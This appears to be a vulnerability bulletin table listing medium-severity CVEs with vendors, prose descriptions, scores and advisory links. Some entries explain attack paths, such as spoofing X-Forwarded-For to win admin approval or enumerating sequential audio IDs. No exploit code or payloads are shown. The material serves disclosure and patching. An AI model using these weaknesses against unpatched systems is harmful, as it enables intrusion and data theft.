| Esri--ArcGIS Server | There is a stored cross-site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files containing malicious code that may execute in the context of a victim's browser. | 2025-12-31 | 6.1 | CVE-2025-67710 | https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch |
| Esri--ArcGIS Server | There is a stored cross-site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files containing malicious code that may execute in the context of a victim's browser. | 2025-12-31 | 6.1 | CVE-2025-67711 | https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch |
| weDevs--WP Project Manager | Insertion of Sensitive Information Into Sent Data vulnerability in weDevs WP Project Manager allows Retrieve Embedded Sensitive Data. This issue affects WP Project Manager: from n/a through 3.0.1. | 2025-12-29 | 6.5 | CVE-2025-68040 | https://vdp.patchstack.com/database/wordpress/plugin/wedevs-project-manager/vulnerability/wordpress-wp-project-manager-plugin-2-6-29-sensitive-data-exposure-vulnerability?_s_id=cve |
| strukturag--libheif | libheif is an HEIF and AVIF file format decoder and encoder. Prior to version 1.21.0, a crafted HEIF that exercises the overlay image item path triggers a heap buffer over-read in `HeifPixelImage::overlay()`. The function computes a negative row length (likely from an unclipped overlay rectangle or invalid offsets), which then underflows when converted to `size_t` and is passed to `memcpy`, causing a very large read past the end of the source plane and a crash. Version 1.21.0 contains a patch. As a workaround, avoid decoding images using `iovl` overlay boxes. | 2025-12-29 | 6.5 | CVE-2025-68431 | https://github.com/strukturag/libheif/security/advisories/GHSA-j87x-4gmq-cqfq https://github.com/strukturag/libheif/commit/b8c12a7b70f46c9516711a988483bed377b78d46 https://github.com/strukturag/libheif/releases/tag/v1.21.0 |
| Crocoblock--JetTabs | Missing Authorization vulnerability in Crocoblock JetTabs allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects JetTabs: from n/a through 2.2.12. | 2025-12-29 | 6.5 | CVE-2025-68498 | https://vdp.patchstack.com/database/wordpress/plugin/jet-tabs/vulnerability/wordpress-jettabs-plugin-2-2-12-broken-access-control-vulnerability?_s_id=cve |
| Crocoblock--JetTabs | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetTabs allows DOM-Based XSS. This issue affects JetTabs: from n/a through 2.2.12. | 2025-12-29 | 6.5 | CVE-2025-68499 | https://vdp.patchstack.com/database/wordpress/plugin/jet-tabs/vulnerability/wordpress-jettabs-plugin-2-2-12-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Crocoblock--JetBlog | Missing Authorization vulnerability in Crocoblock JetBlog allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects JetBlog: from n/a through 2.4.7. | 2025-12-29 | 6.5 | CVE-2025-68503 | https://vdp.patchstack.com/database/wordpress/plugin/jet-blog/vulnerability/wordpress-jetblog-plugin-2-4-7-broken-access-control-vulnerability?_s_id=cve |
| Crocoblock--JetSearch | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetSearch allows DOM-Based XSS. This issue affects JetSearch: from n/a through 3.5.16. | 2025-12-29 | 6.5 | CVE-2025-68504 | https://vdp.patchstack.com/database/wordpress/plugin/jet-search/vulnerability/wordpress-jetsearch-plugin-3-5-16-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Hiroaki Miyashita--Custom Field Template | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hiroaki Miyashita Custom Field Template allows Stored XSS. This issue affects Custom Field Template: from n/a through 2.7.5. | 2025-12-29 | 6.5 | CVE-2025-68607 | https://vdp.patchstack.com/database/wordpress/plugin/custom-field-template/vulnerability/wordpress-custom-field-template-plugin-2-7-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Codeaffairs--Wp Text Slider Widget | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Codeaffairs Wp Text Slider Widget allows Stored XSS. This issue affects Wp Text Slider Widget: from n/a through 1.0. | 2025-12-29 | 6.5 | CVE-2025-68868 | https://vdp.patchstack.com/database/wordpress/plugin/wp-text-slider-widget/vulnerability/wordpress-wp-text-slider-widget-plugin-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| SignalK--signalk-server | Signal K Server is a server application that runs on a central hub in a boat. In versions prior to 2.19.0, two related features of the access request system, combined with each other and with an information disclosure vulnerability, enable convincing social engineering attacks against administrators. When a device creates an access request, it specifies three fields: `clientId`, `description`, and `permissions`. The Signal K admin UI displays the `description` field prominently to the administrator when showing pending requests, but the `permissions` field (which determines the access level actually granted) is less visible or displayed separately, so an attacker can request `admin` permissions while providing a description that suggests read-only access. Separately, the access request handler trusts the `X-Forwarded-For` HTTP header without validation to determine the client's IP address. This header is intended to preserve the original client IP when requests pass through reverse proxies, but when trusted unconditionally it lets an attacker spoof their IP address; the spoofed IP is displayed to administrators in the access request approval interface, making malicious requests appear to originate from trusted internal network addresses. Because device/source names can be enumerated via the information disclosure vulnerability, an attacker can impersonate a legitimate device or source, craft a convincing description, spoof a trusted internal IP address, and request elevated permissions, a combination that substantially increases the likelihood of administrator approval. Users should upgrade to version 2.19.0 to fix this issue. | 2026-01-01 | 6.3 | CVE-2025-69203 | https://github.com/SignalK/signalk-server/security/advisories/GHSA-vfrf-vcj7-wvr8 https://github.com/SignalK/signalk-server/releases/tag/v2.19.0 |
| olell--uURU | Micro Registration Utility (µURU) is a telephone self-registration utility based on Asterisk. In versions up to and including commit 88db9a953f38a3026bcd6816d51c7f3b93c55893, an attacker can craft a special federation name so that characters treated as special by Asterisk are injected into the `Dial()` application, due to improper input validation. This allows the attacker to redirect calls on both federating instances. If the attack succeeds the impact is very high; however, it requires that an admin accept the federation request. As of the time of publication, no patched version of µURU is available. | 2025-12-29 | 6.3 | CVE-2025-69205 | https://github.com/olell/uURU/security/advisories/GHSA-xvrh-pm3f-79v4 https://docs.asterisk.org/Latest_API/API_Documentation/Dialplan_Applications/Dial |
| AsfhtgkDavid--theshit | theshit is a command-line utility that automatically detects and fixes common mistakes in shell commands. Prior to version 0.1.1, the application loads custom Python rules and configuration files from user-writable locations (e.g., `~/.config/theshit/`) without validating ownership or permissions when executed with elevated privileges. If the tool is invoked with `sudo` or otherwise runs with an effective UID of root, it continues to trust configuration files originating from the unprivileged user's environment. This allows a local attacker to inject arbitrary Python code via a malicious rule or configuration file, which is then executed with root privileges. Any system where this tool is executed with elevated privileges is affected. In environments where the tool is permitted to run via `sudo` without a password (`NOPASSWD`), a local unprivileged user can escalate privileges to root without additional interaction. The issue has been fixed in version 0.1.1. The patch introduces strict ownership and permission checks for all configuration files and custom rules: rules are only loaded if they are owned by the effective user executing the tool. When executed with elevated privileges (`EUID=0`), the application refuses to load any files that are not owned by root or that are writable by non-root users; when executed as a non-root user, it similarly refuses to load rules owned by other users. This prevents both vertical and horizontal privilege escalation via execution of untrusted code. If upgrading is not possible, users should avoid executing the application with `sudo` or as the root user. As a temporary mitigation, ensure that directories containing custom rules and configuration files are owned by root and are not writable by non-root users. Administrators may also audit existing custom rules before running the tool with elevated privileges. | 2025-12-30 | 6.7 | CVE-2025-69257 | https://github.com/AsfhtgkDavid/theshit/security/advisories/GHSA-95qg-89c2-w5hj https://github.com/AsfhtgkDavid/theshit/commit/8e0b565e7876a83b0e1cfbacb8af39dadfdcc500 |
| PHPGurukul--Online Course Registration | A vulnerability was found in PHPGurukul Online Course Registration up to 3.1. This issue affects some unknown processing of the file /admin/edit-student-profile.php of the component Student Registration Page. The manipulation of the argument photo results in unrestricted upload. The attack may be launched remotely. The exploit has been made public and could be used. | 2026-01-02 | 6.3 | CVE-2026-0547 | VDB-339355 (PHPGurukul Online Course Registration Student Registration edit-student-profile.php unrestricted upload); VDB-339355 (CTI Indicators (IOB, IOC, TTP, IOA)); Submit #728988 (PHPGurukul Online Course Registration v3.1 Cross Site Scripting); https://github.com/rsecroot/Online-Course-Registration/blob/main/Cross%20Site%20Scripting.md; https://phpgurukul.com/ |
| yeqifu--warehouse | A weakness has been identified in yeqifu warehouse up to aaf29962ba407d22d991781de28796ee7b4670e4. This affects the function saveUserRole of the file warehouse\src\main\java\com\yeqifu\sys\controller\UserController.java of the component Request Handler. This manipulation causes improper authorization. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. | 2026-01-04 | 6.3 | CVE-2026-0574 | VDB-339458 (yeqifu warehouse Request UserController.java saveUserRole improper authorization); VDB-339458 (CTI Indicators (IOB, IOC, TTP, IOA)); Submit #729374 (yeqifu warehouse aaf29962ba407d22d991781de28796ee7b4670e4 vertical privilege escalation); https://github.com/5i1encee/Vul/blob/main/Vertical_privilege_escalation_Vulnerability_in_Project_yeqifu_warehouse.md; https://github.com/5i1encee/Vul/blob/main/Vertical_privilege_escalation_Vulnerability_in_Project_yeqifu_warehouse.md#poc |
| code-projects--Online Product Reservation System | A flaw has been found in code-projects Online Product Reservation System 1.0. Affected by this vulnerability is an unknown functionality of the file /handgunner-administrator/prod.php. Executing manipulation can lead to unrestricted upload. It is possible to launch the attack remotely. The exploit has been published and may be used. | 2026-01-04 | 6.3 | CVE-2026-0577 | VDB-339461 (code-projects Online Product Reservation System prod.php unrestricted upload); VDB-339461 (CTI Indicators (IOB, IOC, TTP, IOA)); Submit #731015 (code-projects Online Product Reservation system in PHP with source code V1.0 Unrestricted Upload); https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/file_upload_prod.php.md; https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/file_upload_prod.php.md#poc; https://code-projects.org/ |
| STVS SA--STVS ProVision | STVS ProVision 5.9.10 contains a cross-site scripting vulnerability in the 'files' POST parameter that allows authenticated attackers to inject arbitrary HTML code. Attackers can exploit the unvalidated input to execute malicious scripts within a user's browser session in the context of the affected site. | 2025-12-31 | 5.4 | CVE-2021-47725 | Zero Science Lab Disclosure (ZSL-2021-5624) Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing IBM X-Force Vulnerability Exchange Vendor Homepage VulnCheck Advisory: STVS ProVision 5.9.10 Authenticated Reflected Cross-Site Scripting via Files Parameter |
| CodexThemes--TheGem (Elementor) | Broken access control vulnerability (per the linked Patchstack advisory) in CodexThemes TheGem (Elementor) and CodexThemes TheGem (WPBakery). This issue affects TheGem (Elementor): from n/a before 5.8.1.1; TheGem (WPBakery): from n/a before 5.8.1.1. | 2025-12-29 | 5.4 | CVE-2023-32238 | https://vdp.patchstack.com/database/wordpress/theme/thegem-elementor/vulnerability/wordpress-thegem-elementor-theme-5-7-2-broken-access-control-vulnerability?_s_id=cve |
| wpdive--Better Elementor Addons | Missing Authorization vulnerability in wpdive Better Elementor Addons allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Better Elementor Addons: from n/a through 1.3.7. | 2025-12-29 | 5.4 | CVE-2023-41656 | https://vdp.patchstack.com/database/wordpress/plugin/better-elementor-addons/vulnerability/wordpress-better-elementor-addons-plugin-1-3-5-broken-access-control-vulnerability?_s_id=cve |
| tareq1988--User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration | The Registration, User Profile, Membership, Content Restriction, User Directory, and Frontend Post Submission - WP User Frontend plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'Frontend_Form_Ajax::submit_post' function in all versions up to, and including, 4.2.4. This makes it possible for unauthenticated attackers to delete attachments. | 2026-01-02 | 5.3 | CVE-2025-14047 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6e95b16f-a25a-45c7-a875-2d34a1e127ce?source=cve https://plugins.trac.wordpress.org/changeset/3430352/wp-user-frontend/trunk/includes/Ajax/Frontend_Form_Ajax.php https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.2/includes/Ajax.php#L25 https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.2/includes/Ajax.php#L69 https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.2/includes/Ajax/Frontend_Form_Ajax.php#L35 https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.2/includes/Ajax/Frontend_Form_Ajax.php#L55 https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.2/includes/Ajax/Frontend_Form_Ajax.php#L133 |
| pixelyoursite--PixelYourSite Your smart PIXEL (TAG) & API Manager | The PixelYourSite plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 11.1.5 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log files, when the "Meta API logs" setting is enabled (disabled by default). The vulnerability was partially patched in version 11.1.5 and fully patched in version 11.1.5.1. | 2025-12-29 | 5.3 | CVE-2025-14280 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0fe77926-8a43-42ce-9d3d-3aac2334dcbd?source=cve https://plugins.trac.wordpress.org/browser/pixelyoursite/tags/11.1.4.2/includes/logger/class-pys-logger.php#L118 https://plugins.trac.wordpress.org/changeset/3424175/pixelyoursite https://plugins.trac.wordpress.org/changeset/3416113/pixelyoursite |
| Gmission--Web Fax | Exposure of Sensitive Information to an Unauthorized Actor, Missing Authorization vulnerability in Gmission Web Fax allows Authentication Abuse.This issue affects Web Fax: from 3.0 before 4.0. | 2025-12-29 | 5.5 | CVE-2025-15070 | https://www.gmission.co.kr/fax1 |
| n/a--Open5GS | A flaw has been found in Open5GS up to 2.7.5. It affects the functions decode_ipv6_header and ogs_pfcp_pdr_rule_find_by_packet in the file lib/pfcp/rule-match.c of the PFCP Session Establishment Request handler. A manipulated request can trigger a reachable assertion. The attack can be launched remotely. An exploit has been published and may be used. The fix is commit b72d8349980076e2c033c8324f07747a86eea4f8; applying it is advised. | 2025-12-29 | 5.3 | CVE-2025-15176 | VDB-338561 (Open5GS PFCP Session Establishment Request rule-match.c ogs_pfcp_pdr_rule_find_by_packet assertion); CTI Indicators (IOB, IOC, IOA); Submit #719830 (Open5GS v2.7.5 Reachable Assertion); https://github.com/open5gs/open5gs/issues/4180; https://github.com/open5gs/open5gs/issues/4180#issuecomment-3615555671; https://github.com/open5gs/open5gs/issues/4180#issue-3666760066; https://github.com/open5gs/open5gs/commit/b72d8349980076e2c033c8324f07747a86eea4f8 |
| Dromara--Sa-Token | A vulnerability has been found in Dromara Sa-Token up to 1.44.0. It affects the function ObjectInputStream.readObject in the file SaSerializerTemplateForJdkUseBase64.java. Manipulated input leads to Java deserialization of untrusted data. The attack can be executed remotely, but is rated high complexity and difficult to exploit. An exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-30 | 5 | CVE-2025-15222 | VDB-338607 (Dromara Sa-Token SaSerializerTemplateForJdkUseBase64.java ObjectInputStream.readObject deserialization); CTI Indicators (IOB, IOC, IOA); Submit #717703 (Sa-Token <=1.44.0 Deserialization); https://github.com/dromara/sa-token; https://github.com/Yohane-Mashiro/satoken-deserialization |
| Tenda--CH22 | A vulnerability has been found in Tenda CH22 up to 1.0.0.1. It affects the function fromDhcpListClient in the file /goform/DhcpListClient. Manipulation of the argument LISTLEN leads to denial of service. The attack may be launched remotely. An exploit has been disclosed publicly and may be used. | 2025-12-30 | 5.3 | CVE-2025-15229 | VDB-338625 (Tenda CH22 DhcpListClient fromDhcpListClient denial of service); CTI Indicators (IOB, IOC, TTP, IOA); Submit #725472 (Tenda CH22 V1.0.0.1 Denial of Service); https://github.com/master-abc/cve/issues/7; https://www.tenda.com.cn/ |
| beecue--FastBee | A vulnerability was detected in beecue FastBee up to 2.1. It affects the function getRootElement in the file springboot/fastbee-server/sip-server/src/main/java/com/fastbee/sip/handler/req/ReqAbstractHandler.java of the SIP Message Handler. Manipulated input results in an XML external entity (XXE) reference. The attack can be launched remotely, but is rated high complexity and difficult to exploit. The project owner replied to the issue report: "Okay, we'll handle it as soon as possible." | 2025-12-30 | 5.6 | CVE-2025-15251 | VDB-338641 (beecue FastBee SIP Message ReqAbstractHandler.java getRootElement xml external entity reference); CTI Indicators (IOB, IOC, IOA); https://gitee.com/beecue/fastbee/issues/ID7HNZ; https://gitee.com/beecue/fastbee/issues/ID7HNZ#note_47777408_link |
| WebAssembly--wabt | A weakness has been identified in WebAssembly wabt up to 1.0.39. It affects the function wabt::AST::InsertNode in the wasm-decompile tool (reported against the file /src/repro/wabt/bin/wasm-decompile). A crafted input causes memory corruption (heap-based buffer overflow). The attack requires local access. An exploit has been made public and could be used. The project has no active maintainer at the moment; in a reply to the issue report, the researcher was advised to submit a PR themselves. | 2026-01-01 | 5.3 | CVE-2025-15411 | VDB-339332 (WebAssembly wabt wasm-decompile InsertNode memory corruption); CTI Indicators (IOB, IOC, IOA); Submit #719825 (WebAssembly wabt 1.0.39 and master-branch Heap-based Buffer Overflow); https://github.com/WebAssembly/wabt/issues/2679; https://github.com/oneafter/1208/blob/main/af1 |
| WebAssembly--wabt | A security vulnerability has been detected in WebAssembly wabt up to 1.0.39. It affects the function wabt::Decompiler::VarName in the wasm-decompile tool (reported against the file /src/repro/wabt/bin/wasm-decompile). A crafted input leads to an out-of-bounds read. The attack requires local access. An exploit has been disclosed publicly and may be used. The project has no active maintainer at the moment; in a reply to the issue report, the researcher was advised to submit a PR themselves. | 2026-01-01 | 5.3 | CVE-2025-15412 | VDB-339333 (WebAssembly wabt wasm-decompile VarName out-of-bounds); CTI Indicators (IOB, IOC, IOA); Submit #719826 (WebAssembly wabt 1.0.39 and master-branch Memory Corruption); https://github.com/WebAssembly/wabt/issues/2678; https://github.com/oneafter/1208/blob/main/af1 |
| n/a--wasm3 | A vulnerability was detected in wasm3 up to 0.5.0. It affects the functions op_SetSlot_i32 and op_CallIndirect in the file m3_exec.h. A crafted input results in memory corruption. The attack requires local access. An exploit is now public and may be used. The project has no active maintainer at the moment. | 2026-01-01 | 5.3 | CVE-2025-15413 | VDB-339334 (wasm3 m3_exec.h op_CallIndirect memory corruption); CTI Indicators (IOB, IOC, IOA); Submit #719829 (wasm3 v0.5.0 and master-branch Memory Corruption); Submit #719831 (wasm3 v0.5.0 and master-branch Memory Corruption, duplicate); https://github.com/wasm3/wasm3/issues/543; https://github.com/wasm3/wasm3/issues/547 |
| EmpireSoft--EmpireCMS | A flaw has been found in EmpireSoft EmpireCMS up to 8.0. It affects the function egetip in the file e/class/connect.php of the IP Address Handler. Manipulated input causes a protection mechanism failure. The attack may be initiated remotely. An exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 5.3 | CVE-2025-15422 | VDB-339344 (EmpireSoft EmpireCMS IP Address connect.php egetip protection mechanism); CTI Indicators (IOB, IOC, IOA); Submit #721344 (EmpireCMS <=8.0 Privilege Escalation); https://note-hxlab.wetolink.com/share/0x74KEtzecFb; https://note-hxlab.wetolink.com/share/0x74KEtzecFb#-span--strong-proof-of-concept---strong---span- |
| yeqifu--carRental | A vulnerability has been found in yeqifu carRental up to commit 3fabb7eae93d209426638863980301d6f99866b3. It affects the function downloadShowFile in the file /file/downloadShowFile.action of the component com.yeqifu.sys.controller.FileController. Manipulation of the argument path leads to path traversal. The attack may be initiated remotely. An exploit has been disclosed publicly and may be used. This product uses a rolling release model to deliver continuous updates, so specific version information for affected or fixed releases is not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-02 | 5.3 | CVE-2025-15432 | VDB-339354 (yeqifu carRental com.yeqifu.sys.controller.FileController downloadShowFile.action downloadShowFile path traversal); CTI Indicators (IOB, IOC, TTP, IOA); Submit #723220 (carRental latest Path Traversal); https://github.com/yeqifu; https://github.com/yeqifu/carRental/issues/46 |
| Petlibro--Smart Pet Feeder Platform | Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contain an information disclosure vulnerability that allows unauthorized access to private audio recordings by exploiting sequential audio IDs and insecure assignment endpoints. Attackers can send requests to /device/deviceAudio/use with arbitrary audio IDs to assign recordings to any device, then retrieve audio URLs to access other users' private recordings. | 2026-01-03 | 5.3 | CVE-2025-3652 | Security Research: Petlibro: Your Pet Feeder Is Feeding Data To Anyone Who Asks; VulnCheck Advisory: Petlibro Smart Pet Feeder Platform through 1.7.31 Audio Information Disclosure via API endpoint |
| Petlibro--Smart Pet Feeder Platform | Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contain an information disclosure vulnerability that allows unauthorized access to device hardware information by exploiting insecure API endpoints. Attackers can retrieve device serial numbers and MAC addresses through /device/devicePetRelation/getBoundDevices using pet IDs, enabling full device control without proper authorization checks. | 2026-01-03 | 5.3 | CVE-2025-3654 | Security Research: Petlibro: Your Pet Feeder Is Feeding Data To Anyone Who Asks; VulnCheck Advisory: Petlibro Smart Pet Feeder Platform through 1.7.31 Information Disclosure via API endpoint |
| Eduardo Villão--MyD Delivery | Authorization Bypass Through User-Controlled Key vulnerability in Eduardo Villão MyD Delivery allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects MyD Delivery: from n/a through 1.3.7. | 2025-12-31 | 5.3 | CVE-2025-49334 | https://vdp.patchstack.com/database/wordpress/plugin/myd-delivery/vulnerability/wordpress-myd-delivery-plugin-1-3-7-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| janhenckens--Dashboard Beacon | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in janhenckens Dashboard Beacon allows Stored XSS. This issue affects Dashboard Beacon: from n/a through 1.2.0. | 2025-12-31 | 5.9 | CVE-2025-49337 | https://vdp.patchstack.com/database/wordpress/plugin/wp-dashboard-beacon/vulnerability/wordpress-dashboard-beacon-plugin-1-2-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Flowbox--Flowbox | Missing Authorization vulnerability in Flowbox allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Flowbox: from n/a through 1.1.5. | 2025-12-31 | 5.3 | CVE-2025-49338 | https://vdp.patchstack.com/database/wordpress/plugin/flowbox/vulnerability/wordpress-flowbox-plugin-1-1-5-broken-access-control-vulnerability?_s_id=cve |
| Reuters News Agency--Reuters Direct | Missing Authorization vulnerability in Reuters News Agency Reuters Direct allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Reuters Direct: from n/a through 3.0.0. | 2025-12-31 | 5.3 | CVE-2025-49349 | https://vdp.patchstack.com/database/wordpress/plugin/reuters-direct/vulnerability/wordpress-reuters-direct-plugin-3-0-0-broken-access-control-vulnerability?_s_id=cve |
| ikaes--Accessibility Press | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ikaes Accessibility Press allows Stored XSS. This issue affects Accessibility Press: from n/a through 1.0.2. | 2025-12-31 | 5.9 | CVE-2025-49355 | https://vdp.patchstack.com/database/wordpress/plugin/ilogic-accessibility/vulnerability/wordpress-accessibility-press-plugin-1-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| meshtastic--firmware | Meshtastic is an open source mesh networking solution. The Meshtastic firmware (starting from version 2.5) introduces asymmetric encryption (PKI) for direct messages, but when the `pki_encrypted` flag is missing, the firmware silently falls back to legacy AES-256-CTR channel encryption. This was an intentional decision to maintain backwards compatibility. However, the end-user applications, like Web app, iOS/Android app, and applications built on top of Meshtastic using the SDK, did not have a way to differentiate between end-to-end encrypted DMs and the legacy DMs. This creates a downgrade attack path where adversaries who know a shared channel key can craft and inject spoofed direct messages that are displayed as if they were PKC encrypted. Users are not given any feedback of whether a direct message was decrypted with PKI or with legacy symmetric encryption, undermining the expected security guarantees of the PKI rollout. Version 2.7.15 fixes this issue. | 2025-12-29 | 5.3 | CVE-2025-53627 | https://github.com/meshtastic/firmware/security/advisories/GHSA-377p-prwp-4hwf |
| Inkthemescom--Black Rider | Insertion of Sensitive Information Into Sent Data vulnerability in Inkthemescom Black Rider allows Retrieve Embedded Sensitive Data. This issue affects Black Rider: from n/a through 1.2.3. | 2025-12-31 | 5.8 | CVE-2025-59003 | https://vdp.patchstack.com/database/wordpress/theme/black-rider/vulnerability/wordpress-black-rider-theme-1-2-3-sensitive-data-exposure-vulnerability?_s_id=cve |
| eLEOPARD--Behance Portfolio Manager | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in eLEOPARD Behance Portfolio Manager allows Stored XSS. This issue affects Behance Portfolio Manager: from n/a through 1.7.5. | 2025-12-31 | 5.9 | CVE-2025-59135 | https://vdp.patchstack.com/database/wordpress/plugin/portfolio-manager-powered-by-behance/vulnerability/wordpress-behance-portfolio-manager-plugin-1-7-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Efí Bank--Gerencianet Oficial | Insertion of Sensitive Information Into Sent Data vulnerability in Efí Bank Gerencianet Oficial allows Retrieve Embedded Sensitive Data. This issue affects Gerencianet Oficial: from n/a through 3.1.3. | 2025-12-31 | 5.3 | CVE-2025-59136 | https://vdp.patchstack.com/database/wordpress/plugin/woo-gerencianet-official/vulnerability/wordpress-gerencianet-oficial-plugin-3-1-3-sensitive-data-exposure-vulnerability?_s_id=cve |
| Damian--WP Export Categories & Taxonomies | Missing Authorization vulnerability in Damian WP Export Categories & Taxonomies allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Export Categories & Taxonomies: from n/a through 1.0.3. | 2025-12-31 | 5.3 | CVE-2025-62079 | https://vdp.patchstack.com/database/wordpress/plugin/wp-export-categories-taxonomies/vulnerability/wordpress-wp-export-categories-taxonomies-plugin-1-0-3-broken-access-control-vulnerability?_s_id=cve |
| Channelize.io Team--Live Shopping & Shoppable Videos For WooCommerce | Missing Authorization vulnerability in Channelize.Io Team Live Shopping & Shoppable Videos For WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Live Shopping & Shoppable Videos For WooCommerce: from n/a through 2.2.0. | 2025-12-31 | 5.3 | CVE-2025-62081 | https://vdp.patchstack.com/database/wordpress/plugin/live-shopping-video-streams/vulnerability/wordpress-live-shopping-shoppable-videos-for-woocommerce-plugin-2-2-0-broken-access-control-vulnerability?_s_id=cve |
| extendons--WordPress & WooCommerce Scraper Plugin, Import Data from Any Site | Server-Side Request Forgery (SSRF) vulnerability in extendons WordPress & WooCommerce Scraper Plugin, Import Data from Any Site allows Server Side Request Forgery. This issue affects WordPress & WooCommerce Scraper Plugin, Import Data from Any Site: from n/a through 1.0.7. | 2025-12-31 | 5.4 | CVE-2025-62088 | https://vdp.patchstack.com/database/wordpress/plugin/wp_scraper/vulnerability/wordpress-wordpress-woocommerce-scraper-plugin-import-data-from-any-site-plugin-1-0-7-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| Vollstart--Serial Codes Generator and Validator with WooCommerce Support | Missing Authorization vulnerability in Vollstart Serial Codes Generator and Validator with WooCommerce Support allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Serial Codes Generator and Validator with WooCommerce Support: from n/a through 2.8.2. | 2025-12-31 | 5.4 | CVE-2025-62091 | https://vdp.patchstack.com/database/wordpress/plugin/serial-codes-generator-and-validator/vulnerability/wordpress-serial-codes-generator-and-validator-with-woocommerce-support-plugin-2-8-2-broken-access-control-vulnerability?_s_id=cve |
| Wiremo--Wiremo | Missing Authorization vulnerability in Wiremo allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Wiremo: from n/a through 1.4.99. | 2025-12-31 | 5.3 | CVE-2025-62092 | https://vdp.patchstack.com/database/wordpress/plugin/woo-reviews-by-wiremo/vulnerability/wordpress-wiremo-plugin-1-4-99-broken-access-control-vulnerability?_s_id=cve |
| Totalsoft--Portfolio Gallery | Missing Authorization vulnerability in Totalsoft Portfolio Gallery allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Portfolio Gallery: from n/a through 1.4.8. | 2025-12-31 | 5.4 | CVE-2025-62098 | https://vdp.patchstack.com/database/wordpress/plugin/gallery-portfolio/vulnerability/wordpress-portfolio-gallery-plugin-1-4-8-broken-access-control-vulnerability?_s_id=cve |
| SaifuMak--Add Custom Codes | Missing Authorization vulnerability in SaifuMak Add Custom Codes allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Add Custom Codes: from n/a through 4.80. | 2025-12-31 | 5.4 | CVE-2025-62108 | https://vdp.patchstack.com/database/wordpress/plugin/add-custom-codes/vulnerability/wordpress-add-custom-codes-plugin-4-80-broken-access-control-vulnerability?_s_id=cve |
| Marcelo Torres--Download Media Library | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Marcelo Torres Download Media Library allows Retrieve Embedded Sensitive Data. This issue affects Download Media Library: from n/a through 0.2.1. | 2025-12-31 | 5.3 | CVE-2025-62114 | https://vdp.patchstack.com/database/wordpress/plugin/download-media-library/vulnerability/wordpress-download-media-library-plugin-0-2-1-sensitive-data-exposure-vulnerability?_s_id=cve |
| Quadlayers--AI Copilot | Missing Authorization vulnerability in Quadlayers AI Copilot allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects AI Copilot: from n/a through 1.4.7. | 2025-12-31 | 5.3 | CVE-2025-62116 | https://vdp.patchstack.com/database/wordpress/plugin/ai-copilot/vulnerability/wordpress-ai-copilot-plugin-1-4-7-broken-access-control-vulnerability?_s_id=cve |
| Jayce53--EasyIndex | Cross-Site Request Forgery (CSRF) vulnerability in Jayce53 EasyIndex easyindex allows Cross Site Request Forgery. This issue affects EasyIndex: from n/a through 1.1.1704. | 2025-12-31 | 5.4 | CVE-2025-62117 | https://vdp.patchstack.com/database/wordpress/plugin/easyindex/vulnerability/wordpress-easyindex-plugin-1-1-1704-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
